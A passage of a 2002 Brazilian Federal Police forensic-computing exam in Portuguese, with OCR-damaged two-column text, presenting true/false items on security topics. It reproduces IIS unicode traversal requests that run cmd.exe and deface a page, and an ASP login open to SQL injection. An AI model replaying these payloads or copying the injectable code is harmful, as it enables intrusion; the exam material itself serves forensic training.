c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\cmd.exe+c:\winnt\s3.exe
HTTP/1.0" 502 259
atacker6.nowhere.com - - [23/Jan/2001:04:32:29 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\cmd.exe+c:\winnt\cmd.exe
HTTP/1.0" 502 259
atacker6.nowhere.com - - [23/Jan/2001:04:33:36 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\s3.exe
HTTP/1.0" 502 242

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 6 / 13 permitida a reproduo, desde que citada a fonte.
atacker6.nowhere.com - - [23/Jan/2001:04:34:11 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1
th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 500 87
atacker6.nowhere.com - - [23/Jan/2001:04:34:28 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1
th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 500 87
atacker6.nowhere.com - - [23/Jan/2001:04:35:55 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1t
h+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 404 461
atacker6.nowhere.com - - [23/Jan/2001:04:37:34 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We
bQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 502 215
atacker6.nowhere.com - - [23/Jan/2001:04:40:09 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We
bQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 502 215
atacker6.nowhere.com - - [23/Jan/2001:04:40:30 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We
bQu33R+>c:\inetpub\wwwroot\myweb.dll HTTP/1.0" 502 215
atacker4.nowhere.com - - [23/Jan/2001:04:40:51 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 200 880
atacker6.nowhere.com - - [23/Jan/2001:04:44:38 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We
bQu33R+>c:\inetpub\wwwroot\myweb.dll HTTP/1.0" 502 215

QUESTO 36

Com base no texto CE, julgue os itens abaixo, referentes aos ataques ao servidor http mencionado nesse texto.

1 As tentativas exploratrias comearam a ter sucesso a partir de 23/1/2001.


2 Verifica-se ataque de defacement (pichao) a pgina Web.
3 A vulnerabilidade explorada nos ataques a do parsing das requisies de arquivo em servidores Web, tambm conhecida como ataque
de unicode, presente no MS IIS verso 5.0.
4 Os logs foram gerados pelo MS IIS.
5 O atacante fez uma cpia de backup da pgina original.
QUESTO 37

Novamente com base no texto CE e acerca dos ataques ao servidor http referido, julgue os itens a seguir.

1 Nos probes exploratrios, o atacante vasculhou diversos diretrios, procurando o arquivo cmd.exe, que um interpretador
de comandos.
2 Atacker copiou cmd.exe em outro arquivo, que posteriormente foi usado no ataque.
3 A pgina inicial do servidor Web atacado residia em Default.htm.
4 O servidor utiliza uma forma elementar de defesa, mantendo a pgina de index em myweb.dll.
5 Atacker6 teve sucesso no ataque.
QUESTO 38

Ainda com base no texto CE, julgue os itens subseqentes, relativos ao servidor http e aos ataques ocorridos.

1 A pgina vulnerada se apresentou em branco com os dizeres H4ck3d by Gund3R0th thanks Gund3R1th Grup WebQu33R.
2 Os ataques no poderiam ser evitados utilizando-se um proxy que restringisse os acessos pgina inicial.
3 No h patch disponvel, atualmente, para corrigir a vulnerabilidade em questo, que seja fornecido pelo autor/fornecedor do
servidor Web.
4 Um dos elementos dos ataques est no fato de o diretrio system32 ter seu acesso liberado, na configurao default do sistema
operacional.
5 Os ataques poderiam ter sido evitados por meio de filtragem de pacotes em um firewall convencional.

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 7 / 13 permitida a reproduo, desde que citada a fonte.
QUESTO 39

O administrador da rede Alfa recebeu diversas reclamaes, de administradores de outras redes, de que uma de suas mquinas
estaria gerando trfego suspeito. A mquina em questo um servidor Unix, servidor03 (endereo IP 192.168.11.1). Abaixo, so
mostradas as pores relevantes dos resultados da execuo, no referido servidor, de alguns comandos.

I comando: netstat

Local address Remote address Swind Send-Q Rwind Recv-Q State


------------------------- ------------------- -------- --------- ------- --------- ------------------
*.12345 *.* 0 0 24576 0 LISTEN

II comando: lsof

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME


laden 7895 root 3u IPv4 978493 TCP *:12345 (LISTEN)

III comando: ps

UID PID PPID C STIME TTY TIME CMD


root 7895 1 0 May 1 ? 0:00 laden

IV comando: find / -name laden print


(no retorna informao)

Alm das informaes acima, em uma inspeo dos mdulos carregados no kernel, no foi apontada nenhuma anormalidade. Nesse caso,
correto concluir que o servidor03 sofreu um comprometimento de root e que

1 no se trata de um rootkit na forma de um LKM.


2 um telnet na porta 12345 do servidor03 chamar o programa suspeito, sendo a melhor forma de avaliar o que ele faz.
3 o programa suspeito executa um unlink antes de se tornar daemon, evitando aparecer no sistema de arquivos.
4 carregado no boot, acarretando, assim, o comprometimento de algum arquivo de inicializao.
5 as cadeias de caracteres podem ser inspecionadas, caso a imagem executvel do programa suspeito possa ser localizada no sistema de
arquivos /proc.
QUESTO 40 QUESTO 41

Com relao aos comprometimentos de mquinas originados a partir Um administrador recebeu a tarefa de instalar um sistema de
deteco de intruso (IDS) adequado em sua rede. Considerando
da explorao de uma sobrecarga de buffer (buffer overflow), julgue
que a rede utiliza apenas comutadores (switches), correto
os itens abaixo. afirmar que o administrador

1 no conseguir executar a tarefa com sucesso, j que, no


1 A ocorrncia de comprometimento est restrita aos sistemas de
switch, ao contrrio do hub, cada porta tem um domnio de
cdigo aberto. coliso distinto.
2 O comprometimento independe da linguagem utilizada na 2 pode, na implantao do sistema IDS, configurar com
implementao do programa especfico que tem seu buffer sucesso o switch para modo debug, ou equivalente, em que
o mesmo passa a operar como hub, sem prejuzo ao
sobrecarregado.
desempenho.
3 Pode-se evitar o buffer overflow utilizando-se firewalls na proteo 3 pode, na configurao do sistema IDS, espelhar as portas do
das mquinas. switch para a porta de backbone, normalmente usada para
4 O buffer overflow consiste em injetar uma cadeia de caracteres uplink/downlink, se houver, no precisando se preocupar com
o trfego de todas as portas convergindo para a porta em que
longa o suficiente para ocupar totalmente o buffer atacado, est o sensor do IDS.
seguindo-se uma chamada de sistema que executa o cdigo 4 pode instalar, na mquina em que rodar o IDS, um mdulo
malicioso. que envie periodicamente pacotes ARP de resposta,
contendo o endereo MAC do sensor do IDS e o endereo IP
5 O buffer overflow genrico utiliza, na sua implementao, o fato de
de todas as mquinas que deseja proteger com o IDS, no
que, na cadeia de caracteres do buffer, s podem ocorrer caracteres precisando reconfigurar o switch.
distintos do delimitador de cadeias, sendo, ento, normalmente 5 pode instalar, na mquina em que rodar o IDS, um mdulo
utilizado no preenchimento do buffer o cdigo correspondente ao que envie periodicamente pacotes ARP de resposta, contendo
endereos MAC fictcios para assim preencher totalmente a
NOOP do sistema-alvo, facilitando a estimao do endereo de tabela de endereos fsicos do switch, acarretando, porm,
retorno da chamada de sistema. prejuzo ao desempenho.

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 8 / 13 permitida a reproduo, desde que citada a fonte.
QUESTO 42 QUESTO 43

Considere uma pgina Web utilizada por um grupo de usurios para Julgue os itens que se seguem, com relao cpia de
alimentar um banco de dados SQL Server. Os usurios realizam o logon arquivos em sistemas Unix.
sobre uma conexo SSL e, se autenticados, podem inserir informaes e(ou)
realizar consultas no banco de dados, que, aps as inseres, envia como
retorno um e-mail de confirmao. O firewall interno s aceita conexes nas 1 Caso se deseje preservar a estrutura lgica do sistema
portas 443 e 25, nos dois extremos da DMZ. Alguns trechos de cdigo de arquivos e os mactimes, a cpia das informaes
correspondentes a essa pgina e ao script de logon so mostrados a seguir. contidas em um disco rgido no deve ser executada
com o comando dd.
pgina Web
2 Ao realizar a cpia das informaes contidas em um
disco rgido utilizando-se o comando tar, preserva-se o
<form name="Logon" method="post"
action="https://www.bigbucks.org/scripts/Logon.asp> sistema de arquivos, tais como os mactimes.
<p><font face="Tahoma"> <i><b>Please enter username and 3 A gerao de hashes md5 funciona como uma
password:</b></i><br> assinatura, tanto do original como da cpia; o hash de
Username uma partio, por exemplo, pode ser obtido com o
<input type="text" name="uname" maxlength="25">
comando dd if=/dev/hda1 | md5sum -b.
<br>
4 Arquivos deletados podem ser recuperados a partir de
<br>
Password sua cpia, utilizando-se, para isso, o comando dd.
<input type="text" name="pword" maxlength="25"> 5 Uma cpia segura pode ser realizada remotamente com
<br> o comando ssh.
</font></p> QUESTO 44
<p>
<input type="submit" name="Submit" value="Submit"> Considere uma rede em que h a suspeita da existncia de
</p> um sniffer instalado em uma das mquinas que compem
</form> a rede, realizando escutas desautorizadas. Com relao a
essa situao, julgue os itens abaixo.
script de logon

Conn.Open Set rst= Conn.Execute("select * from userinfo where 1 Constitui boa estratgia de deteco de sniffer aquela
username = ' " & Request.Form("uname") & " ' and password = ' & que se fundamenta na identificao do trfego gerado
Request.Form("uname") & " ' " por ele durante a escuta, trfego que normalmente
If rst.eof then acontece em grande quantidade, seja o sniffer em redes
Response.Redirect "badlogon.asp" comutadas ou no.
2 Pode-se detectar a existncia de um sniffer na
Com base nessas informaes, julgue os itens seguintes.
rede usando-se outro sniffer e verificando quem faz
consultas de DNS quando uma nova mquina
1 Independentemente do que possa acontecer com as informaes do
banco de dados, correto afirmar que o servidor hospedeiro desse banco adicionada rede.
de dados seguro, j que as conexes so encriptadas e os acessos so 3 Na identificao de um snnifer, constitui boa estratgia
intermediados pelo servidor Web. o envio de pings em broadcast e a comparao dos
2 A simplicidade com que os dados de entrada so validados, repassando- tempos de resposta das vrias mquinas no segmento:
os diretamente para a montagem do statement SQL, atesta o bom design
o tempo de resposta da mquina que contm sniffer
da soluo do controle de acesso, pois o cdigo facilmente auditvel.
3 A crtica inexistente aos dados fornecidos por um usurio permite que se provavelmente ser maior que o das outras mquinas.
monte consultas que resultariam no fornecimento das tabelas com as 4 Um sniffer comum passivo em uma rede
informaes dos usurios. comutada consegue capturar trfego.
4 Na situao apresentada, possvel forar o banco de dados a enviar um 5 A deteco de um sniffer quase sempre acontece com
e-mail com tabelas inteiras.
sucesso, sendo a sua identificao fundamentada no
5 Algum desautorizado pode alterar as informaes do banco de dados.
endereo MAC.

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 9 / 13 permitida a reproduo, desde que citada a fonte.
QUESTO 45

Considere os seguintes trechos de trfego.

trecho I

02:11:26.616090 10.1.1.1.31915 > 10.1.2.1.20197: udp 28 (frag 242:36@0+) (ttl 64)

02:11:26.616445 10.1.1.1 > 10.1.2.1: (frag 242:4@24) (ttl 64)

trecho II

02:12:26.616445 10.1.1.1 > 10.1.2.1: (frag 1242:1480@4240+)

02:12:31.616575 10.1.1.1 > 10.1.2.1: (frag 1242:1480@2490+)

02:12:31.617345 10.1.1.1 > 10.1.2.1: (frag 1242:1480@4240+)

02:12:36.617950 10.1.1.1 > 10.1.2.1: (frag 1242:1480@2240+)

02:12:36.618865 10.1.1.1 > 10.1.2.1: (frag 1242:1480@2490+)

02:12:41.626445 10.1.1.1 > 10.1.2.1: (frag 1242:1480@4240+)

02:12:46.632950 10.1.1.1 > 10.1.2.1: (frag 1242:1480@2240+)

trecho III

02:13:22.216445 truncated-tcp 16 (frag 32470:16@0+)

02:13:22.224445 10.1.1.1 > 10.1.2.1: (frag 32470:4@16)

02:13:22.236645 truncated-tcp 16 (frag 70123:16@0+)

02:13:22.239880 10.1.1.1 > 10.1.2.1: (frag 70123:4@16)

02:13:22.245675 truncated-tcp 16 (frag 12678:16@0+)

02:13:22.247885 10.1.1.1 > 10.1.2.1: (frag 12678:4@16)

Julgue os itens a seguir, relativos a esses trechos de trfego.

1 O trecho I apresenta trfego legtimo, mas que pode causar crashes e travamentos em alguns sistemas operacionais com implementaes

deficientes da pilha TCP/IP.

2 O trecho II poderia indicar um ataque de exausto de recursos do sistema, causando lentido no processamento.

3 O trecho III mostra a fragmentao sobre os cabealhos TCP, de maneira idntica dissimulao de port scans usando o flag FIN.

4 O trecho III tem o mesmo efeito no sistema que o trecho II, s que de forma mais rpida.

5 Os trechos acima utilizam a fragmentao de maneira maliciosa.

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 10 / 13 permitida a reproduo, desde que citada a fonte.
QUESTO 46

A realizao de anlise de trfego em uma rede TCP/IP uma tcnica importante para monitorao e auditoria da rede e de seus servios.
As figuras I e II a seguir, obtidas com o uso da ferramenta Ethereal (www.ethereal.com), apresentam exemplos tpicos de informaes
extradas com o uso de ferramentas analisadoras de rede, que so empregadas na realizao de anlise de trfego.

Figura I

Figura II

Acerca das informaes contidas nas figuras I e II e de suas interpretaes, julgue os itens a seguir, relativos rede mencionada acima.

1 Todo o trfego observado, de acordo com a figura I, utiliza o protocolo IP.


2 De acordo com a figura I, o protocolo UDP no est implementado nessa rede, sendo o protocolo TCP o nico protocolo de transporte
disponvel.
3 O pacote de nmero 42, na figura II, uma retransmisso do pacote de nmero 41.
4 Os pacotes de nmeros 41, 42, 45 e 46, mostrados na figura II, fazem parte de uma mesma conexo TCP no sentido da porta 1024 para
a porta ftp. Por outro lado, os pacotes 43 e 44 fazem parte de outra conexo TCP simtrica, no sentido da porta ftp para a porta 1024.
As duas conexes formam uma ligao TCP bidirecional.
5 A primeira opo do pacote TCP de nmero 41, detalhado na parte inferior da figura II, aparece apenas em mensagens TCP de
estabelecimento de conexo, isto , que possuam o flag de SYN ativo.

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 11 / 13 permitida a reproduo, desde que citada a fonte.
QUESTO 47 QUESTO 48

As tcnicas de criptografia constituem os recursos bsicos para Um sistema criptogrfico constitudo por uma tripla (M,K,C), em

implementao de boa parte das ferramentas que disponibilizam que M o espao das mensagens, K o espao das chaves, e C
o espao dos criptogramas. Associado a esses, tem-se um algoritmo
servios de segurana para os nveis de rede, sistema e servios
criptogrfico, o qual transforma qualquer mensagem m 0 M em um
(aplicaes). Assim, os riscos para cada servio de segurana esto
criptograma c 0 C, de forma controlada por uma chave k 0 K. Pode-
muitas vezes associados aos riscos de quebra dos sistemas e
se representar essa transformao por c = Ek(m), que corresponde
algoritmos criptogrficos utilizados. Acerca de tcnicas de quebra
operao de cifrao, e por m = Dk(c), a operao inversa, de
de sistemas e algoritmos criptogrficos e seus riscos, julgue os itens decifrao. A respeito de sistemas criptogrficos em geral, julgue
a seguir. os itens subseqentes.

1 A quebra de sistemas criptogrficos simtricos sempre depende 1 Em um determinado sistema criptogrfico, para cada mensagem

da descoberta da chave secreta utilizada no processo possvel m, existe apenas um criptograma possvel, c, que ser
o resultado da cifrao de m com determinada chave k. No
criptogrfico.
obstante, mensagens distintas podem resultar em um mesmo
2 Um princpio bsico para a utilizao de senhas em servios de
criptograma, se utilizadas chaves distintas.
segurana, tais como autentificao e controle de acesso,
2 Sistemas criptogrficos so ditos simtricos ou de chave secreta
consiste em no armazenar a senha diretamente pois o acesso a
quando a chave utilizada para cifrar a mesma utilizada para
tal entidade de armazenamento poria em risco toda a segurana decifrar. Sistemas assimtricos ou de chave pblica utilizam
do sistema. Ao contrrio, armazenado um resumo da senha, chaves distintas para cifrar e decifrar. Algoritmos simtricos so
gerado normalmente por algum tipo de funo digestora geralmente mais eficientes computacionalmente que os

unidirecional. Ataques de fora bruta a esses sistemas podem ser assimtricos e por isso so preferidos para cifrar grandes massas
de dados ou para operaes online.
bem sucedidos, caso se encontre a mensagem original utilizada
3 Diz-se que um sistema criptogrfico tem segredo perfeito
na entrada da funo (isto , a senha) ou alguma outra
quando, dado um criptograma c, a incerteza que se tem em
mensagem que resulte em um mesmo resumo que aquele gerado
relao mensagem m que foi cifrada a mesma que se tinha
para a mensagem original.
antes de conhecer o criptograma. Uma condio necessria para
3 Em uma infra-estrutura de chave pblica (ICP), a quebra do que um sistema criptogrfico tenha segredo perfeito que o
certificado (violao da chave privada) de uma autoridade espao de chaves seja pelo menos to grande quanto o espao
certificadora (AC) invalida todos os certificados assinados por de mensagens, ou seja, |K| $ |M|.

esta AC. Assim, toda a segurana da ICP depende da segurana 4 O nico sistema criptogrfico matematicamente inviolvel o

da chave privada da AC raiz. denominado sistema de chave nica. Todos os demais sistemas,
para utilizao em condies reais de aplicao, so
4 Chaves criptogrficas consideradas seguras contra ataques de
teoricamente violveis, ou seja, dados recursos e tempo
fora bruta, para os padres de processamento atuais, devem
ilimitados e quantidade suficiente de criptograma gerado com
possuir pelo menos 128 bits, tanto para criptografia simtrica
uma mesma chave, possvel, sempre, determinar, de forma
quanto para criptografia assimtrica.
unvoca, a chave utilizada.
5 Sistemas que utilizam assinaturas digitais para proviso de 5 Uma tcnica eficiente para tornar um sistema criptogrfico mais
servios de autentificao e no-repdio so tambm imunes a forte se utilizar um algoritmo de compresso de dados aps a
ataques de negao de servio por repetio (replay). cifrao.

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 12 / 13 permitida a reproduo, desde que citada a fonte.
QUESTO 49 QUESTO 50

Em um ambiente de segurana de informaes, senhas e chaves Certificados digitais so documentos eletrnicos concebidos para
criptogrficas devem ser imprevisveis e, preferencialmente, se verificar a autenticidade de um usurio e assegurar que ele
efetivamente tem a posse de um par de chaves (pblica e privada)
geradas de forma totalmente aleatria. Todo sistema criptogrfico
para um determinado sistema criptogrfico de chaves assimtricas.
apresenta o conhecido problema de gerenciamento de chaves, que Certificados digitais so usualmente emitidos por uma terceira parte
trata da gerao, da distribuio, do armazenamento e da troca das confivel, denominada autoridade certificadora (AC). Com relao
chaves utilizadas. Costuma-se considerar que a segurana de um utilizao de certificados digitais para prover maior segurana a
algoritmo criptogrfico est na segurana das chaves utilizadas. um ambiente computacional, julgue os itens abaixo.
Com relao a esse assunto, julgue os itens que se seguem.
1 Certificados digitais se baseiam no conceito de assinatura
digital. O mecanismo usual para se assinar um documento
1 Para um determinado sistema criptogrfico que utiliza chaves de eletrnico primeiro gerar o hash do documento e ento cifrar
128 bits, optou-se por selecionar como gerador de chaves a esse hash com um algoritmo assimtrico, utilizando-se sua
sada do algoritmo MD5, tendo por entrada os seguintes chave privada. O valor assim obtido constitui a assinatura, que
parmetros: a data/hora do sistema quando da gerao da chave, ir permitir, posteriormente, no apenas verificar a autoria do
dada na forma DDMMAAHHMMSS, com o significado usual, documento como tambm a sua integridade.
2 O padro de certificados largamente utilizado hoje em dia o
concatenado com uma seqncia de 16 bytes consecutivos
X.509, em sua verso 3. Um certificado gerado nesse padro
obtida de um arquivo fixo, contendo 64 kilobytes de dados que inclui, essencialmente, um identificador da verso utilizada para
foram gerados de forma totalmente aleatria, e cujo ponto gerar o certificado (1, 2 ou 3); um nmero serial que deve ser
inicial de leitura escolhido a partir de caracteres digitados por nico para cada certificado emitido por dada AC; um
um operador da forma mais imprevisvel possvel. Nessa identificador do algoritmo de assinatura utilizado pela AC; um
situao, como o algoritmo MD5 gera um hash de 128 bits e identificador da AC (DN distinguished name da AC); perodo
de validade do certificado; um identificador do sujeito (DN
no se pode, em princpio, determinar a entrada dada a sada,
distinguished name do sujeito) para o qual est sendo emitido
pode-se considerar esse como um bom mtodo para a gerao o certificado; a chave pblica do sujeito; a chave privada do
dos 128 bits necessrios para uma chave com uma aparncia sujeito; outras informaes opcionais padronizadas; por fim, a
aleatria. prpria assinatura da AC desse conjunto de informaes.
2 O algoritmo DES considerado inseguro por possuir um espao 3 Certificados digitais so comumente emitidos para pessoas
de chaves de apenas 56 bits, sendo, portanto, susceptvel a (fsicas ou jurdicas), mquinas e processos. A utilizao dos
certificados requer o estabelecimento do que se denomina uma
ataques por exausto das chaves, utilizando-se recursos Infraestrutura de Chaves Pblicas (ICP), como recentemente
relativamente modestos com a tecnologia disponvel atualmente. estabelecido pelo governo brasileiro, a ICP-Brasil. ICPs como
Uma forma encontrada para aumentar o espao de chaves de a ICP-Brasil pressupem a existncia de pelo menos uma AC,
algoritmos de bloco do tipo DES foi a implementao cujo prprio certificado auto-assinado, ou seja, ela prpria
denominada triplo-DES, em que se emprega o mesmo algoritmo atesta sua identidade e a deteno de seu par de chaves
assimtricas, sendo ao mesmo tempo, para esse fim, emissor e
3 vezes consecutivas, potencialmente com 3 chaves distintas, o
sujeito no ato de certificao.
que permite uma chave total efetiva correspondente a 3 vezes o 4 A Internet j dispe de recursos bsicos para a utilizao de
tamanho original, ou seja, nesse caso, 168 bits. Por raciocnio certificados digitais por meio do protocolo SSL (Secure Sockets
semelhante, o uso de um duplo-DES deve prover uma segurana Layer), desenvolvido pela empresa Netscape com vistas ao
equivalente a um algoritmo com chave efetiva de 112 bits. desenvolvimento do comrcio eletrnico, e, mais recentemente,
3 Um tipo de funo essencial para uso em ambiente criptogrfico o TLS (Transport Layer Security), desenvolvido a partir do SSL
como um padro do IETF (Internet Engineering Task Force).
a das denominadas funes unidirecionais. Uma funo
A utilizao do SSL/TLS permite: a autentificao mtua das
unidirecional uma transformao fixa (sem chaves) para a qual partes em comunicao por meio da verificao de seus
impraticvel se determinar a entrada a partir da sada. Uma certificados digitais apresentados no incio de uma sesso; o
forma de se obter uma boa funo unidirecional tomar um estabelecimento de uma chave simtrica segura para ser
bom algoritmo criptogrfico, fixar a entrada de dados utilizada entre as partes naquela sesso; a cifrao com um
(mensagem) e utilizar a entrada de chave como entrada de algoritmo simtrico de toda a comunicao de dados, de forma
transparente, no qual utilizada a chave previamente
dados.
estabelecida.
4 O algoritmo RSA um conhecido e popular algoritmo 5 Um dos pontos sensveis na utilizao de um sistema de chaves
assimtrico. A segurana do algoritmo RSA dada pelo pblicas a gerao do par de chaves de um usurio. No
tamanho das chaves utilizadas, da ordem de 1 kilobits, o que somente o processo de gerao deve resultar em uma chave
torna impraticvel a determinao da chave pela exausto das privativa imprevisvel, como esta deve ficar to-somente sob a
possibilidades. guarda de seu proprietrio, com a maior segurana possvel.
O comprometimento da chave privativa de um usurio ou o
5 Ao comparar sistemas criptogrficos simtricos e assimtricos,
acesso mesma por terceiros compromete a segurana em sua
conclui-se que aqueles facilitam a gerao e a troca das chaves, utilizao. Uma forma segura para a gerao e a guarda de
enquanto estes facilitam a distribuio e o armazenamento das chaves e certificados disponvel atualmente o uso de cartes
mesmas. inteligentes (smart cards) para tal finalidade.

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 13 / 13 permitida a reproduo, desde que citada a fonte.

Potrebbero piacerti anche